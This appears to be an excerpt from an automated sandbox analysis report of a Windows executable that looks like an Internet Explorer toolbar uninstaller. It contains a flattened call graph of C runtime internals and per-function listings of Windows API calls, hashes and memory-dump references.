1f21d2 TlsFree 3414->3417 3418 1f21e0 3414->3418 3416 1f20f9 __decode_pointer 6 API calls 3415->3416 3416->3414 3417->3418 3419 1f298b DeleteCriticalSection 3418->3419 3420 1f29a3 3418->3420 3421 1f35ee __freea 66 API calls 3419->3421 3422 1f29b5 DeleteCriticalSection 3420->3422 3423 1f29c3 3420->3423 3421->3418 3422->3420 3423->3246 3425 1f207e __encode_pointer 6 API calls 3424->3425 3426 1f20f7 3425->3426 3426->3360 3428 1f207e __encode_pointer 6 API calls 3427->3428 3429 1f1705 3428->3429 3429->3363 3434 1f264c 3430->3434 3432 1f3188 InitializeCriticalSectionAndSpinCount 3433 1f31cc __mtinitlocknum 3432->3433 3433->3376 3434->3432 3436 1f558b __mtinitlocknum 3435->3436 3437 1f55a3 3436->3437 3442 1f55c2 __crtLCMapStringA_stat 3436->3442 3448 1f2c72 3437->3448 3441 1f5634 HeapAlloc 3441->3442 3442->3441 3445 1f55b8 __mtinitlocknum 3442->3445 3454 1f2aa0 3442->3454 3461 1f4dc3 3442->3461 3467 1f567b 3442->3467 3470 1f31eb 3442->3470 3445->3391 3473 1f22cc GetLastError 3448->3473 3450 1f2c77 3451 1f2c0a 3450->3451 3452 1f20f9 __decode_pointer 6 API calls 3451->3452 3453 1f2c1a __invoke_watson 3452->3453 3455 1f2ac8 EnterCriticalSection 3454->3455 3456 1f2ab5 3454->3456 3455->3442 3515 1f29dd 3456->3515 3458 1f2abb 3458->3455 3459 1f1411 __amsg_exit 65 API calls 3458->3459 3460 1f2ac7 3459->3460 3460->3455 3462 1f4df1 3461->3462 3463 1f4e93 3462->3463 3464 1f4e8a 3462->3464 3707 1f492a 3462->3707 3463->3442 3464->3463 3714 1f49da 3464->3714 3718 1f29c6 LeaveCriticalSection 3467->3718 3469 1f5682 3469->3442 3471 1f20f9 __decode_pointer 6 API calls 3470->3471 3472 1f31fb 3471->3472 3472->3442 3487 1f2174 TlsGetValue 3473->3487 3476 1f2339 SetLastError 3476->3450 3477 1f3730 __calloc_crt 63 API calls 3478 1f22f7 3477->3478 3478->3476 3479 1f20f9 __decode_pointer 6 API calls 3478->3479 3480 1f2311 3479->3480 3481 1f2318 3480->3481 3482 1f2330 3480->3482 3483 1f21e5 __mtinit 63 API calls 3481->3483 3492 1f35ee 3482->3492 3485 1f2320 GetCurrentThreadId 3483->3485 3485->3476 3486 1f2336 3486->3476 3488 1f2189 3487->3488 3489 1f21a4 3487->3489 3490 1f20f9 __decode_pointer 6 API calls 3488->3490 3489->3476 3489->3477 3491 1f2194 TlsSetValue 3490->3491 3491->3489 3495 1f35fa __mtinitlocknum 3492->3495 3493 1f3673 _realloc __mtinitlocknum 3493->3486 3494 1f3639 3494->3493 3496 1f364e HeapFree 3494->3496 3495->3493 3495->3494 3497 1f2aa0 __lock 64 API calls 3495->3497 3496->3493 3498 1f3660 3496->3498 3500 1f3611 ___sbh_find_block 3497->3500 3499 1f2c72 _strcat_s 64 API calls 3498->3499 3501 1f3665 GetLastError 3499->3501 3502 1f362b 3500->3502 3505 1f4614 3500->3505 3501->3493 3511 1f3644 3502->3511 3506 1f4653 3505->3506 3510 1f48f5 ___sbh_free_block 3505->3510 3507 1f483f VirtualFree 3506->3507 3506->3510 3508 1f48a3 3507->3508 3509 1f48b2 VirtualFree HeapFree 3508->3509 3508->3510 3509->3510 3510->3502 3514 1f29c6 LeaveCriticalSection 3511->3514 3513 1f364b 3513->3494 3514->3513 3516 1f29e9 __mtinitlocknum 3515->3516 3530 1f2a0f 3516->3530 3541 1f18c4 3516->3541 3518 1f2a1f __mtinitlocknum 3518->3458 3523 1f2a31 3526 1f2c72 _strcat_s 66 API calls 3523->3526 3524 1f2a40 3527 1f2aa0 __lock 66 API calls 3524->3527 3526->3518 3529 1f2a47 3527->3529 3531 1f2a4f 3529->3531 3532 1f2a7b 3529->3532 3530->3518 3587 1f36eb 3530->3587 3534 1f317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3531->3534 3533 1f35ee __freea 66 API calls 3532->3533 3535 1f2a6c 3533->3535 3536 1f2a5a 3534->3536 3592 1f2a97 3535->3592 3536->3535 3538 1f35ee __freea 66 API calls 3536->3538 3539 1f2a66 3538->3539 3540 1f2c72 _strcat_s 66 API calls 3539->3540 3540->3535 3595 1f35a3 3541->3595 3544 1f35a3 __set_error_mode 66 API calls 3546 1f18d8 3544->3546 3545 1f1719 __NMSG_WRITE 66 API calls 3547 1f18f0 3545->3547 3546->3545 3548 1f18fa 3546->3548 3549 1f1719 __NMSG_WRITE 66 API calls 3547->3549 3550 1f1719 3548->3550 3549->3548 3551 1f172d 3550->3551 3552 1f35a3 __set_error_mode 63 API calls 3551->3552 3583 1f1888 3551->3583 3553 1f174f 3552->3553 3554 1f188d GetStdHandle 3553->3554 3556 1f35a3 __set_error_mode 63 API calls 3553->3556 3555 1f189b _strlen 3554->3555 3554->3583 3559 1f18b4 WriteFile 3555->3559 3555->3583 3557 1f1760 3556->3557 3557->3554 3558 1f1772 3557->3558 3558->3583 3601 1f353b 3558->3601 3559->3583 3562 1f17a8 GetModuleFileNameA 3564 1f17c6 3562->3564 3568 1f17e9 _strlen 3562->3568 3566 1f353b _strcpy_s 63 API calls 3564->3566 3567 1f17d6 3566->3567 3567->3568 3569 1f2ae2 __invoke_watson 10 API calls 3567->3569 3580 1f182c 3568->3580 3617 1f33f0 3568->3617 3569->3568 3573 1f1850 3574 1f337c _strcat_s 63 API calls 3573->3574 3577 1f1864 3574->3577 3576 1f2ae2 __invoke_watson 10 API calls 3576->3573 3579 1f1875 3577->3579 3581 1f2ae2 __invoke_watson 10 API calls 3577->3581 3578 1f2ae2 __invoke_watson 10 API calls 3578->3580 3635 1f3213 3579->3635 3626 1f337c 3580->3626 3581->3579 3584 1f1465 3583->3584 3673 1f143a GetModuleHandleW 3584->3673 3591 1f36f4 3587->3591 3589 1f2a2a 3589->3523 3589->3524 3590 1f370b Sleep 3590->3591 3591->3589 3591->3590 3677 1f54b5 3591->3677 3706 1f29c6 LeaveCriticalSection 3592->3706 3594 1f2a9e 3594->3518 3596 1f35b2 3595->3596 3597 1f18cb 3596->3597 3598 1f2c72 _strcat_s 66 API calls 3596->3598 3597->3544 3597->3546 3599 1f35d5 3598->3599 3600 1f2c0a _strcat_s 6 API calls 3599->3600 3600->3597 3602 1f354c 3601->3602 3604 1f3553 3601->3604 3602->3604 3608 1f3579 3602->3608 3603 1f2c72 _strcat_s 66 API calls 3605 1f3558 3603->3605 3604->3603 3606 1f2c0a _strcat_s 6 API calls 3605->3606 3607 1f1794 3606->3607 3607->3562 3610 1f2ae2 3607->3610 3608->3607 3609 1f2c72 _strcat_s 66 API calls 3608->3609 3609->3605 3662 1f5320 3610->3662 3612 1f2b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3613 1f2beb GetCurrentProcess TerminateProcess 3612->3613 3616 1f2bdf __invoke_watson 3612->3616 3664 1f10cc 3613->3664 3615 1f17a5 3615->3562 3616->3613 3622 1f3402 3617->3622 3618 1f3406 3619 1f1819 3618->3619 3620 1f2c72 _strcat_s 66 API calls 3618->3620 3619->3578 3619->3580 3621 1f3422 3620->3621 3623 1f2c0a _strcat_s 6 API calls 3621->3623 3622->3618 3622->3619 3624 1f344c 3622->3624 3623->3619 3624->3619 3625 1f2c72 _strcat_s 66 API calls 3624->3625 3625->3621 3627 1f338d 3626->3627 3628 1f3394 3626->3628 3627->3628 3631 1f33c8 3627->3631 3629 1f2c72 _strcat_s 66 API calls 3628->3629 3634 1f3399 3629->3634 3630 1f2c0a _strcat_s 6 API calls 3632 1f183f 3630->3632 3631->3632 3633 1f2c72 _strcat_s 66 API calls 3631->3633 3632->3573 3632->3576 3633->3634 3634->3630 3636 1f20f0 __init_pointers 6 API calls 3635->3636 3637 1f3223 3636->3637 3638 1f3236 LoadLibraryA 3637->3638 3639 1f32be 3637->3639 3640 1f324b GetProcAddress 3638->3640 3641 1f3360 3638->3641 3646 1f20f9 __decode_pointer 6 API calls 3639->3646 3659 1f32e8 3639->3659 3640->3641 3643 1f3261 3640->3643 3641->3583 3642 1f3313 3644 1f20f9 __decode_pointer 6 API calls 3642->3644 3647 1f207e __encode_pointer 6 API calls 3643->3647 3644->3641 3645 1f20f9 __decode_pointer 6 API calls 3655 1f332b 3645->3655 3648 1f32db 3646->3648 3649 1f3267 GetProcAddress 3647->3649 3650 1f20f9 __decode_pointer 6 API calls 3648->3650 3651 1f207e __encode_pointer 6 API calls 3649->3651 3650->3659 3652 1f327c GetProcAddress 3651->3652 3653 1f207e __encode_pointer 6 API calls 3652->3653 3654 1f3291 GetProcAddress 3653->3654 3656 1f207e __encode_pointer 6 API calls 3654->3656 3655->3642 3658 1f20f9 __decode_pointer 6 API calls 3655->3658 3657 1f32a6 3656->3657 3657->3639 3660 1f32b0 GetProcAddress 3657->3660 3658->3642 3659->3642 3659->3645 3661 1f207e __encode_pointer 6 API calls 3660->3661 3661->3639 3663 1f532c __VEC_memzero 3662->3663 3663->3612 3665 1f10d6 IsDebuggerPresent 3664->3665 3666 1f10d4 3664->3666 3672 1f28d2 3665->3672 3666->3615 3669 1f1358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3670 1f137d GetCurrentProcess TerminateProcess 3669->3670 3671 1f1375 __invoke_watson 3669->3671 3670->3615 3671->3670 3672->3669 3674 1f144e GetProcAddress 3673->3674 3675 1f1463 ExitProcess 3673->3675 3674->3675 3676 1f145e 3674->3676 3676->3675 3678 1f5568 3677->3678 3687 1f54c7 3677->3687 3679 1f31eb _malloc 6 API calls 3678->3679 3680 1f556e 3679->3680 3682 1f2c72 _strcat_s 65 API calls 3680->3682 3681 1f18c4 __FF_MSGBANNER 65 API calls 3681->3687 3693 1f5560 3682->3693 3684 1f1719 __NMSG_WRITE 65 API calls 3684->3687 3685 1f5524 HeapAlloc 3685->3687 3686 1f1465 _fast_error_exit 3 API calls 3686->3687 3687->3681 3687->3684 3687->3685 3687->3686 3688 1f5554 3687->3688 3689 1f31eb _malloc 6 API calls 3687->3689 3691 1f5559 3687->3691 3687->3693 3694 1f5466 3687->3694 3690 1f2c72 _strcat_s 65 API calls 3688->3690 3689->3687 3690->3691 3692 1f2c72 _strcat_s 65 API calls 3691->3692 3692->3693 3693->3591 3696 1f5472 __mtinitlocknum 3694->3696 3695 1f54a3 __mtinitlocknum 3695->3687 3696->3695 3697 1f2aa0 __lock 66 API calls 3696->3697 3698 1f5488 3697->3698 3699 1f4dc3 ___sbh_alloc_block 5 API calls 3698->3699 3700 1f5493 3699->3700 3702 1f54ac 3700->3702 3705 1f29c6 LeaveCriticalSection 3702->3705 3704 1f54b3 3704->3695 3705->3704 3706->3594 3708 1f493d HeapReAlloc 3707->3708 3709 1f4971 HeapAlloc 3707->3709 3710 1f495f 3708->3710 3711 1f495b 3708->3711 3709->3711 3712 1f4994 VirtualAlloc 3709->3712 3710->3709 3711->3464 3712->3711 3713 1f49ae HeapFree 3712->3713 3713->3711 3715 1f49f1 VirtualAlloc 3714->3715 3717 1f4a38 3715->3717 3717->3463 3718->3469 3719->3397 3738 1f29c6 LeaveCriticalSection 3720->3738 3722 1f227c 3722->3407 3724 1f3cbf 3723->3724 3725 1f3cbc InterlockedIncrement 3723->3725 3726 1f3ccc 3724->3726 3727 1f3cc9 InterlockedIncrement 3724->3727 3725->3724 3728 1f3cd9 3726->3728 3729 1f3cd6 InterlockedIncrement 3726->3729 3727->3726 3730 1f3ce3 InterlockedIncrement 3728->3730 3731 1f3ce6 3728->3731 3729->3728 3730->3731 3732 1f3cff InterlockedIncrement 3731->3732 3733 1f3d0f InterlockedIncrement 3731->3733 3734 1f3d1a InterlockedIncrement 3731->3734 3732->3731 3733->3731 3734->3410 3739 1f29c6 LeaveCriticalSection 3735->3739 3737 1f22ca 3737->3412 3738->3722 3739->3737 3740->3272 3742 1f3808 3741->3742 3743 1f1dd3 3742->3743 3744 1f382f __VEC_memcpy 3742->3744 3743->3291 3744->3743 3746 1f368d 3745->3746 3747 1f3694 3745->3747 3746->3747 3752 1f36c0 3746->3752 3748 1f2c72 _strcat_s 66 API calls 3747->3748 3749 1f3699 3748->3749 3750 1f2c0a _strcat_s 6 API calls 3749->3750 3751 1f36a8 3750->3751 3751->3304 3752->3751 3753 1f2c72 _strcat_s 66 API calls 3752->3753 3753->3749 3755 1f2dc9 3754->3755 3756 1f207e __encode_pointer 6 API calls 3755->3756 3757 1f2de1 3755->3757 3756->3755 3757->3316 3761 1f2d70 3758->3761 3760 1f2db9 3760->3318 3762 1f2d7c __mtinitlocknum 3761->3762 3769 1f147d 3762->3769 3768 1f2d9d __mtinitlocknum 3768->3760 3770 1f2aa0 __lock 66 API calls 3769->3770 3771 1f1484 3770->3771 3772 1f2c85 3771->3772 3773 1f20f9 __decode_pointer 6 API calls 3772->3773 3774 1f2c99 3773->3774 3775 1f20f9 __decode_pointer 6 API calls 3774->3775 3776 1f2ca9 3775->3776 3777 1f2d2c 3776->3777 3792 1f539a 3776->3792 3789 1f2da6 3777->3789 3779 1f2d13 3780 1f207e __encode_pointer 6 API calls 3779->3780 3783 1f2d21 3780->3783 3781 1f2cc7 3781->3779 3782 1f2ceb 3781->3782 3805 1f377c 3781->3805 3782->3777 3786 1f377c __realloc_crt 73 API calls 3782->3786 3787 1f2d01 3782->3787 3785 1f207e __encode_pointer 6 API calls 3783->3785 3785->3777 3786->3787 3787->3777 3788 1f207e __encode_pointer 6 API calls 3787->3788 3788->3779 3855 1f1486 3789->3855 3793 1f53a6 __mtinitlocknum 3792->3793 3794 1f53b6 3793->3794 3795 1f53d3 3793->3795 3796 1f2c72 _strcat_s 66 API calls 3794->3796 3797 1f5414 HeapSize 3795->3797 3799 1f2aa0 __lock 66 API calls 3795->3799 3798 1f53bb 3796->3798 3801 1f53cb __mtinitlocknum 3797->3801 3800 1f2c0a _strcat_s 6 API calls 3798->3800 3802 1f53e3 ___sbh_find_block 3799->3802 3800->3801 3801->3781 3810 1f5434 3802->3810 3806 1f3785 3805->3806 3808 1f37c4 3806->3808 3809 1f37a5 Sleep 3806->3809 3814 1f569d 3806->3814 3808->3782 3809->3806 3813 1f29c6 LeaveCriticalSection 3810->3813 3812 1f540f 3812->3797 3812->3801 3813->3812 3815 1f56a9 __mtinitlocknum 3814->3815 3816 1f56be 3815->3816 3817 1f56b0 3815->3817 3819 1f56c5 3816->3819 3820 1f56d1 3816->3820 3818 1f54b5 _malloc 66 API calls 3817->3818 3835 1f56b8 _realloc __mtinitlocknum 3818->3835 3821 1f35ee __freea 66 API calls 3819->3821 3827 1f5843 3820->3827 3849 1f56de ___sbh_resize_block ___sbh_find_block 3820->3849 3821->3835 3822 1f5876 3824 1f31eb _malloc 6 API calls 3822->3824 3823 1f2aa0 __lock 66 API calls 3823->3849 3826 1f587c 3824->3826 3825 1f5848 HeapReAlloc 3825->3827 3825->3835 3829 1f2c72 _strcat_s 66 API calls 3826->3829 3827->3822 3827->3825 3828 1f589a 3827->3828 3830 1f31eb _malloc 6 API calls 3827->3830 3833 1f5890 3827->3833 3831 1f2c72 _strcat_s 66 API calls 3828->3831 3828->3835 3829->3835 3830->3827 3832 1f58a3 GetLastError 3831->3832 3832->3835 3836 1f2c72 _strcat_s 66 API calls 3833->3836 3835->3806 3838 1f5811 3836->3838 3837 1f5769 HeapAlloc 3837->3849 3838->3835 3839 1f5816 GetLastError 3838->3839 3839->3835 3840 1f57be HeapReAlloc 3840->3849 3841 1f4dc3 ___sbh_alloc_block 5 API calls 3841->3849 3842 1f5829 3842->3835 3844 1f2c72 _strcat_s 66 API calls 3842->3844 3843 1f31eb _malloc 6 API calls 3843->3849 3847 1f5836 3844->3847 3845 1f580c 3848 1f2c72 _strcat_s 66 API calls 3845->3848 3846 1f37f0 __VEC_memcpy _realloc 3846->3849 3847->3832 3847->3835 3848->3838 3849->3822 3849->3823 3849->3835 3849->3837 3849->3840 3849->3841 3849->3842 3849->3843 3849->3845 3849->3846 3850 1f4614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3849->3850 3851 1f57e1 3849->3851 3850->3849 3854 1f29c6 LeaveCriticalSection 3851->3854 3853 1f57e8 3853->3849 3854->3853 3858 1f29c6 LeaveCriticalSection 3855->3858 3857 1f148d 3857->3768 3858->3857 3860 1f1561 __mtinitlocknum 3859->3860 3861 1f2aa0 __lock 66 API calls 3860->3861 3862 1f1568 3861->3862 3863 1f1594 3862->3863 3867 1f1631 __initterm 3862->3867 3865 1f20f9 __decode_pointer 6 API calls 3863->3865 3868 1f159f 3865->3868 3878 1f166c 3867->3878 3869 1f1621 __initterm 3868->3869 3872 1f20f9 __decode_pointer 6 API calls 3868->3872 3869->3867 3871 1f1669 __mtinitlocknum 3871->3335 3877 1f15b4 3872->3877 3873 1f1660 3874 1f1465 _fast_error_exit 3 API calls 3873->3874 3874->3871 3875 1f20f0 6 API calls __init_pointers 3875->3877 3876 1f20f9 6 API calls __decode_pointer 3876->3877 3877->3869 3877->3875 3877->3876 3879 1f164d 3878->3879 3880 1f1672 3878->3880 3879->3871 3882 1f29c6 LeaveCriticalSection 3879->3882 3883 1f29c6 LeaveCriticalSection 3880->3883 3882->3873 3883->3879 4420 1f1242 4421 1f1257 4420->4421 4422 1f1251 4420->4422 4426 1f16bc 4421->4426 4423 1f1697 _raise 66 API calls 4422->4423 4423->4421 4425 1f125c __mtinitlocknum 4427 1f1555 _doexit 66 API calls 4426->4427 4428 1f16c7 4427->4428 4428->4425 3947 1f1281 3950 1f283c 3947->3950 3949 1f1286 3949->3949 3951 1f286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3950->3951 3952 1f2861 3950->3952 3953 1f2865 3951->3953 3952->3951 3952->3953 3953->3949

                                                Executed Functions

                                                Function 001F1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 001F1006
                                                • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 001F1013
                                                • GetLastError.KERNEL32 ref: 001F101F
                                                • GetCommandLineW.KERNEL32(?), ref: 001F1040
                                                • CommandLineToArgvW.SHELL32(00000000), ref: 001F1047
                                                • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 001F1061
                                                • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 001F1073
                                                • LoadLibraryW.KERNELBASE(?), ref: 001F1085
                                                • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 001F1097
                                                • FreeLibrary.KERNELBASE(00000000), ref: 001F10A4
                                                • CloseHandle.KERNELBASE(00000000), ref: 001F10AB
                                                • CoUninitialize.COMBASE ref: 001F10B1
                                                • LocalFree.KERNEL32(00000000), ref: 001F10BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                • API String ID: 474438367-4110843154
                                                • Opcode ID: 11ebbd388d42e917a99b8fa97135a739e8df2ad46386142533ae7dcf3fc80078
                                                • Instruction ID: c1af612fdd54cf30868530993c9e6b350173734838c5f451c1ceb4a28e7e3387
                                                • Opcode Fuzzy Hash: 11ebbd388d42e917a99b8fa97135a739e8df2ad46386142533ae7dcf3fc80078
                                                • Instruction Fuzzy Hash: 3A11903260966DFBC720AB60AC08ABF379CFF547617140629FB46D2450DF718986CBB6
                                                Function 001F1465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 16 1f1465-1f1476 call 1f143a ExitProcess
                                                APIs
                                                • ___crtCorExitProcess.LIBCMT ref: 001F146D
                                                  • Part of subcall function 001F143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,001F1472,?,?,001F54EE,000000FF,0000001E,?,001F36FC,?,00000001,?,?,001F2A2A,00000018), ref: 001F1444
                                                  • Part of subcall function 001F143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001F1454
                                                • ExitProcess.KERNEL32 ref: 001F1476
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                • String ID:
                                                • API String ID: 2427264223-0
                                                • Opcode ID: 32513c2b4187aa233a5c93b0d394c3624ae7de9034c04708109f895ad56e2ef4
                                                • Instruction ID: 106bd731a796129fb6033bf2f02fd2695993111733ec6f00e098fc367b5448fb
                                                • Opcode Fuzzy Hash: 32513c2b4187aa233a5c93b0d394c3624ae7de9034c04708109f895ad56e2ef4
                                                • Instruction Fuzzy Hash: 55B0923100010CFBDF022F12DC0A86D3F2AFBC03A0BA08020F90849031DF72AD92EAA4
                                                Function 001F261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 19 1f261b-1f263d HeapCreate 20 1f263f-1f2640 19->20 21 1f2641-1f264a 19->21
                                                APIs
                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 001F2630
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: CreateHeap
                                                • String ID:
                                                • API String ID: 10892065-0
                                                • Opcode ID: 15abc3d65e1a545e08d402db5bd57aac6cb78f3c21a4422e73e8e36b0a3fd4e2
                                                • Instruction ID: e71e422006bc30c0bf67b38f2b5605ec6e4e3025e19a85f9c0405006bea5c294
                                                • Opcode Fuzzy Hash: 15abc3d65e1a545e08d402db5bd57aac6cb78f3c21a4422e73e8e36b0a3fd4e2
                                                • Instruction Fuzzy Hash: 7DD05E326583485EDB009F71AC48B323BDCD3843A5F148435BA0DC6A90EA70C5D1CA00
                                                Function 001F1681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 22 1f1681-1f168d call 1f1555 24 1f1692-1f1696 22->24
                                                APIs
                                                • _doexit.LIBCMT ref: 001F168D
                                                  • Part of subcall function 001F1555: __lock.LIBCMT ref: 001F1563
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F159A
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15AF
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15D9
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15EF
                                                  • Part of subcall function 001F1555: __decode_pointer.LIBCMT ref: 001F15FC
                                                  • Part of subcall function 001F1555: __initterm.LIBCMT ref: 001F162B
                                                  • Part of subcall function 001F1555: __initterm.LIBCMT ref: 001F163B
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                • String ID:
                                                • API String ID: 1597249276-0
                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction ID: b034bdb52071a595335410ec25eb8f231108f29f12351b095b1e0b8020bd2aa7
                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction Fuzzy Hash: 9AB0123258030C73DB202586EC03F163F0D87D1BA4F250020FB0C1D1F1EAA3B96184CA

                                                Non-executed Functions

                                                Function 001F10CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 001F1346
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001F135B
                                                • UnhandledExceptionFilter.KERNEL32(001F816C), ref: 001F1366
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 001F1382
                                                • TerminateProcess.KERNEL32(00000000), ref: 001F1389
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484363295.00000000001FA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                • Associated: 0000002A.00000002.3484383020.00000000001FC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_42_2_1f0000_Cy9OUo.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: 1fe52934702017840c022c4260b6894f8618b49f4ba613f3d8ebb0de6bc66c45
                                                • Instruction ID: f97268ab7e0f519d2096343e6e6cdbd931282efc3597556de0326031f909ea54
                                                • Opcode Fuzzy Hash: 1fe52934702017840c022c4260b6894f8618b49f4ba613f3d8ebb0de6bc66c45
                                                • Instruction Fuzzy Hash: D2219AF4901248DFC710DFA8ED446783BB0BF58352B90401AFA0C86E60EBBC69C9CB46
                                                Function 001F21E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,001F9458,0000000C,001F2320,00000000,00000000,?,001F174F,00000003,?,?,?,?,?,?,001F10F6), ref: 001F21F7
                                                • __crt_waiting_on_module_handle.LIBCMT ref: 001F2202
                                                  • Part of subcall function 001F13E1: Sleep.KERNEL32(000003E8,00000000,?,001F2148,KERNEL32.DLL,?,001F2194,?,001F174F,00000003), ref: 001F13ED
                                                  • Part of subcall function 001F13E1: GetModuleHandleW.KERNEL32(?,?,001F2148,KERNEL32.DLL,?,001F2194,?,001F174F,00000003,?,?,?,?,?,?,001F10F6), ref: 001F13F6
                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 001F222B
                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 001F223B
                                                • __lock.LIBCMT ref: 001F225D
                                                • InterlockedIncrement.KERNEL32(001FA4D8), ref: 001F226A
                                                • __lock.LIBCMT ref: 001F227E
                                                • ___addlocaleref.LIBCMT ref: 001F229C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000002A.00000002.3484326502.00000000001F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001F0000, based on PE: true
                                                • Associated: 0000002A.00000002.3484305410.00000000001F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
